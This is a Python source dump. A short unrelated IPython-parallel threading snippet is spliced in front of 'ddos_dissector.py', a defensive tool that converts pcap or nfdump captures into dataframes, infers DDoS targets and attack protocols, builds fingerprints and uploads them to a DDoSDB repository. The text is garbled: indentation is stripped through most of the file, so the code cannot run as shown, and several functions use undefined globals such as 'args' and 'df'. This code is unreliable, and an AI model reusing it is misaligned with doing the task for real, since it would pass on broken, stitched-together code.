import Queue  # Python 2 stdlib; on Python 3 this module is `queue`
import threading
from IPython.parallel import Client  # on newer installs: `from ipyparallel import Client`
def gpuWrap(dv, q):
    q.put(dv.apply(useGPUs))
def fWrap(dv, i, q):
    q.put(dv.apply(f, i))
# we assume that the engines have been correctly instantiated
def main( ):
q = Queue.Queue() # collect results in here
threads = []
seqNum = 1
c = Client()
for i in range(100):
dv = c[i]
if i % 4 == 0:
# we assume the GPU is attached to processing element 0
t = threading.Thread(target=gpuWrap, args=(dv, q))
else:
t = threading.Thread(target=fWrap, args=(dv, seqNum, q))
seqNum = seqNum + 1
threads.append(t)
for thread in threads:
thread.start()
for thread in threads:
        thread.join()
# at this point q should be full of AsyncResult objects that can be used to
# get the results of the individual processes as they complete
|
ddos_dissector.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
# Concordia Project
#
# This project has received funding from the European Union’s Horizon
# 2020 Research and Innovation program under Grant Agreement No 830927.
#
# Joao Ceron - joaoceron@sidn.nl
###############################################################################
###############################################################################
### Python modules
import time
import threading
import sys
import subprocess
import socket
import signal
import shutil
import requests
import re
import copy
import queue as queue
import pandas as pd
import os
import numpy as np
import logging
import json
import hashlib
import cursor
import configparser
import ipaddr
import argparse
import urllib3
from subprocess import check_output, STDOUT
from pygments.lexers import JsonLexer
from pygments.formatters import TerminalFormatter
from pygments import highlight
from io import StringIO
from datetime import datetime
from argparse import RawTextHelpFormatter
from hashlib import sha256
###############################################################################
### Program settings
verbose = False
program_name = os.path.basename(__file__)
version = "3.2"
# GLOBAL parameters
# percentage used to determine correlation between two lists
SIMILARITY_THRESHOLD = 80
NONE = -1
FLOW_TYPE = 0
PCAP_TYPE = 1
CARPET_BOMBING_SIMILARITY_THRESHOLD = 20
# define local subnet (CIDR size)
CARPET_BOMBING_SUBNET = 20
###############################################################################
### Subroutines
#------------------------------------------------------------------------------
def parser_add_arguments():
"""
    Parse command line parameters
"""
parser = argparse.ArgumentParser(prog=program_name, usage='%(prog)s [options]', epilog="Example: ./%(prog)s -f ./pcap_samples/sample1.pcap --summary --upload ", formatter_class=RawTextHelpFormatter)
parser.add_argument("--version", help="print version and exit", action="store_true")
parser.add_argument("-v","--verbose", help="print info msg", action="store_true")
parser.add_argument("-d","--debug", help="print debug info", action="store_true")
parser.add_argument("-q","--quiet", help="ignore animation", action="store_true")
parser.add_argument("--status", dest='status', help="check available repositories", action="store_true")
parser.add_argument("-s","--summary", help="present fingerprint evaluation summary", action="store_true")
parser.add_argument("-u","--upload", help="upload to the selected repository", action="store_true")
parser.add_argument("--log", default='ddos_dissector.log', nargs='?',help="Log filename. Default =./ddos_dissector.log\"")
parser.add_argument("--fingerprint_dir", default='fingerprints', nargs='?',help="Fingerprint storage directory. Default =./fingerprints\"")
parser.add_argument("--config", default='ddosdb.conf', nargs='?',help="Configuration File. Default =./ddosdb.conf\"")
parser.add_argument("--host", nargs='?',help="Upload host. ")
parser.add_argument("--user", nargs='?',help="repository user. ")
parser.add_argument("--passwd", nargs='?',help="repository password.")
parser.add_argument("-n", "--noverify", help="disable verification of the host certificate (for self-signed certificates)", action="store_true")
parser.add_argument("-g","--graph", help="build dot file (graphviz). It can be used to plot a visual representation\n of the attack using the tool graphviz. When this option is set, youn will\n received information how to convert the generate file (.dot) to image (.png).", action="store_true")
parser.add_argument ('-f','--filename', required=True, nargs='+')
return parser
#------------------------------------------------------------------------------
def signal_handler(signum, handler):
"""
Signal handler
"""
sys.stdout.flush()
print('\nCtrl+C detected.')
cursor.show()
sys.exit(0)
#------------------------------------------------------------------------------
class CustomConsoleFormatter(logging.Formatter):
"""
Log facility format
"""
def format(self, record):
formater = "%(levelname)s - %(message)s"
if record.levelno == logging.INFO:
GREEN = '\033[32m'
reset = "\x1b[0m"
log_fmt = GREEN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.DEBUG:
CYAN = '\033[36m'
reset = "\x1b[0m"
log_fmt = CYAN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.ERROR:
MAGENTA = '\033[35m'
reset = "\x1b[0m"
log_fmt = MAGENTA + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.WARNING:
YELLOW = '\033[33m'
reset = "\x1b[0m"
log_fmt = YELLOW + formater + reset
self._style._fmt = log_fmt
else:
self._style._fmt = formater
return super().format(record)
#------------------------------------------------------------------------------
def logger(args):
"""
    Instantiate logging facility. By default, info logs are also
stored in the logfile.
param: cmd line args
"""
logger = logging.getLogger(__name__)
# add custom formater
my_formatter = CustomConsoleFormatter()
# Create handlers
console_handler = logging.StreamHandler()
console_handler.setFormatter(my_formatter)
# enable file logging when verbose/debug is set
if args.debug or args.verbose:
file_handler = logging.FileHandler(args.log)
if (args.debug):
logger.setLevel(logging.DEBUG)
file_handler.setLevel(logging.DEBUG)
elif (args.verbose):
logger.setLevel(logging.INFO)
file_handler.setLevel(logging.INFO)
f_format = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)")
file_handler.setFormatter(f_format)
logger.addHandler(file_handler)
# add handlers to the logger
logger.addHandler(console_handler)
return logger
#------------------------------------------------------------------------------
def upload(fingerprint, json_file, user, passw, host, key):
"""
Upload a fingerprint and attack vector to DDoSDB
:param fingerprint: Path to the fingerprint file
:param json_file: fingerprint generated file
:param username: DDoSDB username
:param password: DDoSDB password
:return: status_code describing HTTP code received
"""
if not os.path.isfile(json_file):
logger.critical("Could not read the fingerprint json file {}".format(json_file))
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
# build headers for repo fingerprint submission
headers = {
"X-Username": user,
"X-Password": passw,
"X-Filename": key
}
try:
urllib3.disable_warnings()
r = requests.post(host+"upload-file", files=files, headers=headers, verify=not args.noverify)
except requests.exceptions.SSLError as e:
logger.critical("SSL Certificate verification of the server {} failed".format(host))
print("If you trust {} re-run with --noverify / -n flag to disable certificate verification".format(host))
logger.debug("Cannot connect to the server to upload fingerprint: {}".format(e))
return None
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to upload fingerprint")
logger.debug("Cannot connect to the server to upload fingerprint: {}".format(e))
print (e)
return None
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
elif (r.status_code==201):
print ("Upload success: \n\tHTTP CODE [{}] \n\tFingerprint ID [{}]".format(r.status_code,key))
print ("\tURL: {}query?q={}".format(host,key))
else:
print ("Internal Server Error. Check repository Django logs.")
print ("Error Code: {}".format(r.status_code))
return r.status_code
#------------------------------------------------------------------------------
def get_repository(args,config):
"""
Check credentials and repository based on configuration file or cmd line args
:param args: cmd args
:param config: configuration file
return: user,pass,host: credentials for the repository
"""
user,passw,host = (None,)*3
# look for the repository to upload
if not (args.host):
logger.info("Upload host not defined. Pick the first one in the configuration file.")
config_host = config.sections()[0]
if not (config_host):
logger.critical("Could not find repository configuration. Check configuration file [dddosdb.conf].")
else:
logger.info("Assumming configuration section [{}].".format(config_host))
user = config[config_host]['user']
passw = config[config_host]['passwd']
host = config[config_host]['host']
elif args.host:
host = args.host
if (args.user and args.passwd):
user = args.user
passw = args.passwd
# user/pass not defined by cmd line
else:
# try to find in the configuration file
if args.host in config.sections():
logger.info("Host found in the configuration file")
user = config[args.host]['user']
passw = config[args.host]['passwd']
else:
logger.critical("Credentials not found for [{}].".format(args.host))
else:
logger.critical("Cannot find repository {} credentials. You should define in the cmd line or configuration file [dddosdb.conf].".format(args.host))
return None
return (user,passw,host)
#------------------------------------------------------------------------------
def prepare_tshark_cmd(input_path):
"""
Prepare the tshark command that converts a PCAP to a CSV.
:param input_path: filename
return: tshark command line to be used to convert the file
"""
tshark = shutil.which("tshark")
if not tshark:
logger.error("Tshark software not found. It should be on the path.\n")
return
cmd = [tshark, '-r', input_path, '-T', 'fields']
# fields included in the csv
fields = [
'dns.qry.type', 'ip.dst','ip.flags.mf', 'tcp.flags', 'ip.proto',
'ip.src', '_ws.col.Destination', '_ws.col.Protocol', '_ws.col.Source',
'dns.qry.name', 'eth.type', 'frame.len', '_ws.col.Info', 'udp.length',
'http.request', 'http.response', 'http.user_agent', 'icmp.type',
'ip.frag_offset', 'ip.ttl', 'ntp.priv.reqcode', 'tcp.dstport',
'tcp.srcport', 'udp.dstport', 'udp.srcport', 'frame.time_epoch',
]
for f in fields:
cmd.append('-e')
cmd.append(f)
# field options
options = ['header=y', 'separator=,', 'quote=d', 'occurrence=f' ]
for o in options:
cmd.append('-E')
cmd.append(o)
return cmd
#------------------------------------------------------------------------------
def flow_to_df(ret,filename):
"""
Convert flow file (nfdump) to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
nfdump = shutil.which("nfdump")
    if not nfdump:
        logger.error("NFDUMP software not found. It should be on the path.")
        ret.put(NONE)
        sys.exit()
    cmd = [nfdump, '-r', filename, '-o', 'extended', '-o', 'json' ]
    try:
        cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
    except:
        ret.put(NONE)
        sys.exit()
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_json(data).fillna(NONE)
df = df[['t_first', 't_last', 'proto', 'src4_addr', 'dst4_addr',
'src_port', 'dst_port', 'fwd_status', 'tcp_flags',
'src_tos', 'in_packets', 'in_bytes', 'icmp_type',
'icmp_code',
]]
df = df.rename(columns={'dst4_addr': 'ip_dst',
'src4_addr': 'ip_src',
'src_port': 'srcport',
'dst_port': 'dstport',
't_start' : 'frame_time_epoch',
})
df.dstport = df.dstport.astype(float).astype(int)
df.srcport = df.srcport.astype(float).astype(int)
# convert protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['proto'] = df['proto'].apply(lambda x: protocol_names[x])
# convert protocol/port to service
def convert_protocol_service(row):
try:
highest_protocol = socket.getservbyport(row['dstport'], row['proto'].lower()).upper()
return highest_protocol
except:
return "UNKNOWN"
df['highest_protocol'] = df[['dstport','proto']].apply(convert_protocol_service,axis=1)
# convert to unix epoch (sec)
df['frame_time_epoch'] = pd.to_datetime(df['t_first']).astype(int) / 10**9
df = df.drop(['t_last','t_first','fwd_status'],axis=1)
ret.put(df)
#------------------------------------------------------------------------------
def pcap_to_df(ret,filename):
"""
Convert pcap file to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
cmd = prepare_tshark_cmd(filename)
if not cmd:
ret.put(NONE)
sys.exit()
try:
cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
except:
ret.put(NONE)
sys.exit()
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_csv(data,low_memory=False,error_bad_lines=False)
# src/dst port
if (set(['tcp.srcport','udp.srcport','tcp.dstport','udp.dstport']).issubset(df.columns)):
# Combine source and destination ports from tcp and udp
df['srcport'] = df['tcp.srcport'].fillna(df['udp.srcport'])
df['dstport'] = df['tcp.dstport'].fillna(df['udp.dstport'])
df['dstport'] = df['dstport'].fillna(NONE).astype(float).astype(int)
df['srcport'] = df['srcport'].fillna(NONE).astype(float).astype(int)
if (set(['ip.src','ip.dst','_ws.col.Source','_ws.col.Destination']).issubset(df.columns)):
# Combine source and destination IP - works for IPv6
df['ip.src'] = df['ip.src'].fillna(df['_ws.col.Source'])
df['ip.dst'] = df['ip.dst'].fillna(df['_ws.col.Destination'])
# rename protocol field
df = df.rename({'_ws.col.Protocol': 'highest_protocol'},axis=1)
# protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['ip.proto'] = df['ip.proto'].fillna(NONE).astype(float).astype(int)
df['ip.proto'] = df['ip.proto'].apply(lambda x: protocol_names[x] if (x>0) else -1)
df['ip.ttl'] = df['ip.ttl'].fillna(NONE).astype(float).astype(int)
df['udp.length'] = df['udp.length'].fillna(NONE).astype(float).astype(int)
df['ntp.priv.reqcode'] = df['ntp.priv.reqcode'].fillna(NONE).astype(float).astype(int)
# timestamp
df['start_timestamp'] = df['frame.time_epoch'].iloc[0]
# Remove columns: 'tcp.srcport', 'udp.srcport','tcp.dstport', 'udp.dstport', _ws.col.Source, _ws.col.Destination
df.drop(['tcp.srcport', 'udp.srcport', 'tcp.dstport', 'udp.dstport','_ws.col.Source', '_ws.col.Destination'], axis=1, inplace=True)
# Drop all empty columns (for making the analysis more efficient! less memory.)
df.dropna(axis=1, how='all', inplace=True)
df = df.fillna(NONE)
if 'icmp.type' in df.columns:
df['icmp.type'] = df['icmp.type'].astype(int)
if 'dns.qry.type' in df.columns:
df['dns.qry.type'] = df['dns.qry.type'].astype(int)
if 'ip.frag_offset' in df.columns:
df['ip.frag_offset'] = df['ip.frag_offset'].astype(str)
if 'ip.flags.mf' in df.columns:
df['ip.flags.mf'] = df['ip.flags.mf'].astype(str)
if ('ip.flags.mf' in df.columns) and ('ip.frag_offset' in df.columns):
# Analyse fragmented packets
df['fragmentation'] = (df['ip.flags.mf'] == '1') | (df['ip.frag_offset'] != '0')
df.drop(['ip.flags.mf', 'ip.frag_offset'], axis=1, inplace=True)
# translate flags to string
# if 'tcp.flags.str' in df.columns:
# df['tcp.flags.str'] = df['tcp.flags.str'].str.encode("utf-8")
df.columns = [c.replace('.', '_') for c in df.columns]
# remove info field
del df['_ws_col_Info']
ret.put(df)
#------------------------------------------------------------------------------
## Function for calculating the TOP 'N' and aggregate the 'others'
## Create a dataframe with the top N values and create an 'others' category
def top_n_dataframe(dataframe_field,df,n_type,top_n=20):
"""
Find top n values in one dataframe
:param dataframe_field: field to be evaluated
:param df: full dataframe
:param n_type: network file type (pcap or flow)
:param top_n: build dataframe with the top_n results
return df: dataframe itself
"""
field_name = dataframe_field.name
if (field_name == "frame_time_epoch" or field_name=="start_timestamp"):
return pd.DataFrame()
# flow - different heuristic
if (n_type==FLOW_TYPE):
if (field_name == "in_packets"):
return pd.DataFrame()
data = df.groupby(field_name)["in_packets"].sum().sort_values(ascending=False)
top = data[:top_n].reset_index()
top.columns = [field_name,'count']
new_row = pd.DataFrame(data = {
'count' : [ data[top_n:].reset_index().iloc[:,1].sum()],
field_name : ['others'],
})
# pcap
else:
top = df[field_name].value_counts().reset_index()[:top_n]
new_row = pd.DataFrame(data = {
'count' : [df[field_name].value_counts().reset_index()[top_n:][field_name].sum()],
field_name : ['others'],
})
# combine the result dataframe (top_n + aggregated 'others')
top.columns = [field_name, 'count']
top_result = pd.concat([top, new_row],sort=False)
# percentage field
df = top_result.groupby(field_name).sum()
df=df.sort_values(by="count", ascending=False)
df['percent'] = df.transform(lambda x: (x/np.sum(x)*100).round()).astype(int)
if (len(df)< 16):
# z-score useless when few elements
df['zscore'] = NONE
else:
# z-score of 2 indicates that an observation is two standard deviations above the average
# a z-score of zero represents a value that equals the mean.
df['zscore'] = ((df['count'] - df['count'].mean())/df['count'].std(ddof=0)).round().fillna(NONE)
return (df.reset_index())
#------------------------------------------------------------------------------
def infer_target_ip (df,n_type):
"""
df: dataframe from pcap
n_type: network file type (flows,pcap)
return: list of target IPs
"""
# Check the dst_ip frequency distribution.
# When the second most often dst_ip is grouped in the category "others" (remains)
# this means that we have a high entropy in the set.
    # A lot of requests target multiple dst_ips
# ip_dst count percent zscore
# 94.198.154.130 2799 50 4.0
# others 1842 33 2.0 <-- not an outlier
# 94.198.154.24 86 2 -0.0
data = top_n_dataframe(df.ip_dst,df,n_type)
data = data[(data.iloc[1,0] == "others") & (data['zscore'] <3)].size
if not data:
logger.info("There are several destination IP in the dataset. High entropy. Effectiveness will be low.")
# find outlier
outlier = find_outlier(df['ip_dst'],df,n_type)
if (not outlier or len(outlier)<1):
logger.debug("We cannot find the DDoS target IP address. Not enought info to find the outlier.")
logger.debug("Trying to aggregate top IPs")
data = top_n_dataframe(df['ip_dst'],df,n_type)
        # Outlier was not found (i.e. the processed attack targets multiple IP addresses)
        # Check for a carpet-bombing attack (which targets multiple IP addresses in the same subnet)
        #
        # Try to cluster the victim IPs; usually they are part of the same network block.
        # Select IPs responsible for more than 20% of the traffic and try to cluster them.
        # If they fall in the same range (network mask longer than /21) we combine them and use that as the target.
data_ = data[(data['percent']> CARPET_BOMBING_SIMILARITY_THRESHOLD)]['ip_dst'].tolist()
ip_lst = sorted(data[(data['percent']> CARPET_BOMBING_SUBNET)]['ip_dst'].tolist())
# filter ipv4|ipv6 only
ips = []
for ip in ip_lst:
try:
ipaddr.IPAddress(ip)
except:
continue
ips.append(ip)
# only one IP address has return
if (len(ips)<2):
return (ips,df)
        lowest_ip = ipaddr.IPAddress(ips[0])
        highest_ip = ipaddr.IPAddress(ips[-1])
        # aggregation mask size
        mask_length = ipaddr._get_prefix_length(int(lowest_ip), int(highest_ip), lowest_ip.max_prefixlen)
if (mask_length > 21):
logger.debug("Top IPs are correlated")
# rewrite to one IP address
            for ip in ip_lst[1:]:
                df.loc[df['ip_dst'] == ip, "ip_dst"] = ip_lst[0]
return ( (ip_lst[0]).split(), df)
else:
# return the top 1
            return ([df['ip_dst'].value_counts().keys()[0]], df)
else:
return (outlier,df)
#------------------------------------------------------------------------------
def animated_loading(msg="loading ", count=-1):
"""
print loading animation
:param msg: prefix label
"""
chars = " ▁▂▃▄▅▆▇▇▇▆▅▄▃▂▁ "
if (count == -1):
cursor.hide()
for char in chars:
#sys.stdout.write('\r'+msg+''+char)
sys.stdout.write('\r'+'['+char+'] '+msg)
time.sleep(.05)
sys.stdout.flush()
cursor.show()
else:
char = chars[ int(count/2) % len(chars)]
sys.stdout.write('\r' + '[' + char + '] ' + msg)
time.sleep(.05)
sys.stdout.flush()
#------------------------------------------------------------------------------
def find_outlier(df_filtered,df,n_type,strict=0):
"""
Find outlier based in zscore
:param df_filtered: dataframe filtered by target_ip
:param df: full dataframe used for flows analysis
:param n_type: network file type (flows,pcap)
:param strict: turn the outlier process less flexible (ignore zscore, use frequency)
"""
field_name = df_filtered.name
# summarization dataframe
data = top_n_dataframe(df_filtered,df,n_type)
if (data.empty):
return
outlier_field = data.columns[0]
# be more strict in the filter
if (strict):
data_ = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']>2)]
# if the filter does not return anything, check if the df is
# composed by only one field
if (data_.size==0):
# get first line from the summarized dataframe
data = data.head(1)
# ignore zscore, use frequency threshold
data = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']<0) & (data[outlier_field]!="others")]
if (data.empty): return
outliers = data.iloc[:,0].tolist()
logger.debug("Outliers for .:{}:. --> {} \n {}" .format(outlier_field, outliers, data.head(5).to_string(index=False) ))
logger.debug('-' * 60)
return (outliers)
else:
# return the filtered dataframe saved in aux var
data = data_
# regular process - no strict
else:
data = data[(data['percent']> SIMILARITY_THRESHOLD) | (data['zscore']>2)]
if (len(data)==0): return None
outliers = data.iloc[:,0].tolist()
if (outliers == NONE):
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return
# remove outlier when dispersion is equal to `others` values, for example:
# srcport count percent zscore
# 443 2157 39 3.0
# others 2135 38 3.0
zscore_others = data.loc[data[outlier_field] == "others", 'zscore'].tolist()
if (zscore_others):
# remove all fields with the same values than `others`
outliers = data[data.zscore!=zscore_others[0]].iloc[:,0].tolist()
logger.debug('-' * 60)
if (len(outliers)>0):
logger.debug("Outliers for .:{}:. --> {} \n {}" .format(data.columns[0], outliers, data.head(5).to_string(index=False) ))
return outliers
else:
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return None
#------------------------------------------------------------------------------
# Infer the attack based on filtered dataframe
def infer_protocol_attack(df,n_type):
"""
Evaluate protocol distribution and return the used in the attack
:param df: dataframe
:param n_type: network file type (flows,pcap)
    return: the list of top protocols and whether a fragmentation protocol was found
"""
target_ip = df['ip_dst'].iloc[0]
logger.info("A total of {} IPs have attacked the victim {}".format(df.ip_src.nunique(), target_ip))
# find protocol outliers
outlier = find_outlier(df['highest_protocol'],df,n_type)
# there is no outlier
if not outlier:
# top protocol in the distribution
top1_protocol = df["highest_protocol"].value_counts().keys()[0]
# IPv4 and IPv6 as highest_protocol denotes a fragmentation attack
if bool(re.search('IPv[46]',top1_protocol)):
frag = True
data = top_n_dataframe(df['highest_protocol'],df,n_type)
# fragmentation attack is bigger than 50% of the provided traffic (empirical value)
if (data['percent'].iloc[0] > 50):
logger.debug("Frag Attack: a large fraction of traffic {}% is related to fragmentation attack".format(data['percent'].iloc[0]))
# remove fragmentation protocol from the dataframe
data = top_n_dataframe(df['highest_protocol'],df[df['highest_protocol'] != "IPv4"],n_type)
# find outlier again by ignoring fragmentation protocol (just removed)
outlier = find_outlier(data['highest_protocol'],data,n_type)
if not outlier:
# still no outlier. It seems that we have an even protocol distribution
# this may be caused by multi-vector attack
                    # If the remaining protocols have a similar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
#protocol_list = data[data['percent']>30].sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# did not get outliers and it is not fragmentation attack
# multiprotocol attack with no fragmentation
frag = False
data = top_n_dataframe(df['highest_protocol'],df,n_type)
            # If the remaining protocols have a similar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# outlier found
logger.debug("Protocol outlier found: {}".format(outlier))
# return the top1
logger.debug("Top1 protocol could be classified as outlier")
top1_protocol = df["highest_protocol"].value_counts().reset_index().head(1)['index'].tolist()
frag = False
return (top1_protocol,frag)
return None
#------------------------------------------------------------------------------
def determine_file_type(input_file):
"""
Determine what sort of file the input is.
:param input_file: The path to the file, e.g. /home/user/example.pcap
:return: The file type of the input file as a string
:raises UnsupportedFileTypeError: If input file is not recognised or not supported
"""
file_ = shutil.which("file")
if not file_:
logger.error("File software not found. It should be on the path.\n")
return (NONE)
file_info, error = subprocess.Popen([file_, input_file], stdout=subprocess.PIPE).communicate()
file_type = file_info.decode("utf-8").split()[1]
if file_type == "tcpdump":
return "pcap"
if file_type == "pcap":
return "pcap"
elif file_type == "pcap-ng" or file_type == "pcapng":
return "pcapng"
elif file_type == "data" and (b"nfdump" in file_info or b"nfcapd" in file_info):
return "nfdump"
else:
logger.critical("The file [{}] type [{}] is not supported.".format(input_file,file_type))
sys.exit(0)
#------------------------------------------------------------------------------
def load_file(args,filename):
"""
Wrapper to call attack file to dataframe
:param args: command line parameters
:return n_type: network file type (flows,pcap)
:return df: dataframe itself
"""
file_type = determine_file_type(filename)
if (file_type == NONE):
return (NONE,NONE)
if re.search(r'nfdump', file_type):
load_function = flow_to_df
n_type = FLOW_TYPE
elif re.search(r'pcap', file_type):
load_function = pcap_to_df
n_type = PCAP_TYPE
# load dataframe using threading
ret = queue.Queue()
the_process = threading.Thread(name='process', target=load_function, args=(ret,filename))
the_process.start()
msg = "Loading network file: `{}' ".format(filename)
try:
count = 0
cursor.hide()
while the_process.is_alive():
if the_process:
animated_loading(msg, count=count) if not args.quiet else 0
count += 1
cursor.show()
the_process.join()
except (KeyboardInterrupt, SystemExit):
cursor.show()
signal_handler(None,None)
df = ret.get()
# not a dataframe
if not isinstance(df, pd.DataFrame):
print ("\n")
return(NONE,NONE)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
return (n_type,df)
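# Minimal sketch (illustrative only, never called) of the thread-plus-queue pattern used by
# load_file() above: the worker puts its result on a queue.Queue, the caller joins the thread
# and reads the result back. `_worker` is a stand-in for flow_to_df / pcap_to_df.
def _example_threaded_loader():
    def _worker(out_queue, value):
        out_queue.put(value * 2)
    ret = queue.Queue()
    worker = threading.Thread(target=_worker, args=(ret, 21))
    worker.start()
    worker.join()
    return ret.get()  # -> 42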
#------------------------------------------------------------------------------
def multi_attack_vector_heuristic(df_filtered,n_type):
"""
Generic heuristic to deal with low accuracy ratio fingerprint
    :param df_filtered: dataframe filtered by target_ip
:param n_type: network file type (flows,pcap)
:return fingerprint: json file
"""
logger.debug("ATTACK TYPE 3: NON MULTIFRAG FRAGMENTATION ATTACK")
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_filtered[field],df_filtered,n_type,True)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def multifragmentation_heuristic(df_filtered,n_type):
"""
    Determine whether multiple protocols were used in a fragmentation attack
    :param df_filtered: dataframe filtered by target_ip
    :param n_type: network file type (flows,pcap)
    :return fingerprint: json file
"""
# flow does not have fragmentation info
if (n_type == FLOW_TYPE):
return (None)
fingerprint = {}
df_ = df.fragmentation.value_counts(normalize=True).mul(100).reset_index()
value = df_.loc[:,"fragmentation"].values[0]
df_['index']=df_['index'].astype(bool)
# percentage of packets with fragmentation
try:
frag_percentage = df_[(df_['fragmentation']>SIMILARITY_THRESHOLD) & (df_['index'].values)[0]==True].values[0][1]
except (ValueError,IndexError):
return None
# high chances to have multi protocol frag attack
if (frag_percentage > SIMILARITY_THRESHOLD):
logger.debug("ATTACK TYPE 2: MULTIPROTOCOL FRAGMENTATION ATTACK")
# find protocols responsible for that fragmentation
df_ = df.groupby(['highest_protocol','fragmentation'])['fragmentation'].count().to_frame().\
rename(columns={'fragmentation':'count'}).reset_index()
        # more than one protocol may be responsible for that fragmentation percentage per group;
# then, find the percentage of frag per protocol
df_['percent_frag'] = df_.groupby(['highest_protocol'])['count'].transform(lambda x: (x/x.sum()).mul(100))
df_['percent'] = (df_['count'] / df_['count'].sum()) * 100
df_['fragmentation']=df_['fragmentation'].astype(bool)
# protocol with high percentage of frag
protocols = df_[(df_.fragmentation == True) & (df_.percent>SIMILARITY_THRESHOLD) & \
(df_.percent_frag>SIMILARITY_THRESHOLD) ]['highest_protocol'].tolist()
if not protocols:
return
# find respective src_port
logger.info("Reprocessing attack based on protocols: {}".format(protocols))
df_filtered = df_filtered[df_filtered.highest_protocol.isin(protocols)]
srcports_frag = df[df.highest_protocol.isin(protocols)]['srcport'].unique().tolist()
outlier = find_outlier(df[df.highest_protocol.isin(protocols)]['srcport'],df_filtered,n_type)
# remove port "NONE" (assigned to IPv4 frag protocol)
if (NONE in srcports_frag) or (not outlier):
#srcports_frag.remove(NONE)
srcports_frag = [NONE]
else:
# add srcport to the fingerprint
fingerprint.update( { "srcport" : srcports_frag } )
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
for field in fields:
outlier = find_outlier(df_filtered[field],df,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
    # remove fields that may overlap the srcport outliers
if 'ip_proto' in fingerprint:
del fingerprint['ip_proto']
if 'ip_ttl' in fingerprint:
del fingerprint['ip_ttl']
return (fingerprint)
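# Toy example (illustrative only, never called) of the groupby/transform trick used above to
# compute the per-protocol fragmentation percentage: within each protocol the counts are
# normalised to 100%.
def _example_percent_frag():
    toy = pd.DataFrame({
        "highest_protocol": ["UDP", "UDP", "DNS"],
        "fragmentation":    [True, False, False],
        "count":            [80, 20, 50],
    })
    toy["percent_frag"] = toy.groupby("highest_protocol")["count"].transform(lambda x: (x/x.sum()).mul(100))
    # the UDP rows become 80.0 and 20.0, the single DNS row becomes 100.0
    return toy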
#------------------------------------------------------------------------------
def generate_dot_file(df_fingerprint, df):
"""
Build .dot file that is used to generate a png file showing the
fingerprint match visualization
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param df: dataframe itself
"""
# sum up dataframe to plot
df_fingerprint = df_fingerprint[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_fingerprint['match'] = 1
df_remain = df[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_remain['match'] = 0
df_plot = pd.concat([df_fingerprint,df_remain], ignore_index=True)
# anonymize plot data
df_plot.reset_index(inplace=True)
df_plot.drop('ip_src',axis=1,inplace=True)
df_plot = df_plot.rename(columns={"index": "ip_src"})
df_plot['ip_dst'] = "victim"
logger.debug("Distribution of filtered traffic: \n{}".format(df_plot.match.value_counts(normalize=True).mul(100)))
filename, file_extension = os.path.splitext(args.filename)
with open(filename+".dot", 'w+', encoding = 'utf-8') as f:
f.write("graph {\n")
for index, row in df_plot.iterrows():
if (row['match'] == 0 ):
f.write("\t {} -- {}[color=green,penwidth=1.0];\n".format(row["ip_src"], row["ip_dst"]))
else:
f.write("\t {} -- {}[color=red,penwidth=2.0];\n".format(row["ip_src"], row["ip_dst"]))
f.write("}\n")
print ("Use the following command to generate an image:")
print ("\t sfdp -x -Goverlap=scale -Tpng {}.dot > {}.png".format(filename,filename))
# print ("\t convert {}.png -gravity North -background YellowGreen -splice 0x18 -annotate +0+2 'Dissector' {}.gif ".format(filename,filename))
#------------------------------------------------------------------------------
def printProgressBar(value,label,fill_chars="■-"):
"""
Print progress bar
:param value: value to be printed
:param label: label used as title
:param fill_chars: char used in the animation
"""
if (args.quiet): return True
n_bar = 40 #size of progress bar
max = 100
j= value/max
sys.stdout.write('\r')
bar = fill_chars[0] * int(n_bar * j)
bar = bar + fill_chars[1] * int(n_bar * (1-j))
sys.stdout.write(f"{label.ljust(16)} | [{bar:{n_bar}s}] {int(100 * j)}% ")
sys.stdout.flush()
print ("")
return True
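# Illustrative sketch (never called): what printProgressBar() renders for a 40% value,
# assuming args.quiet is False.
def _example_progress_bar():
    printProgressBar(40, "TRAFFIC MATCHED")
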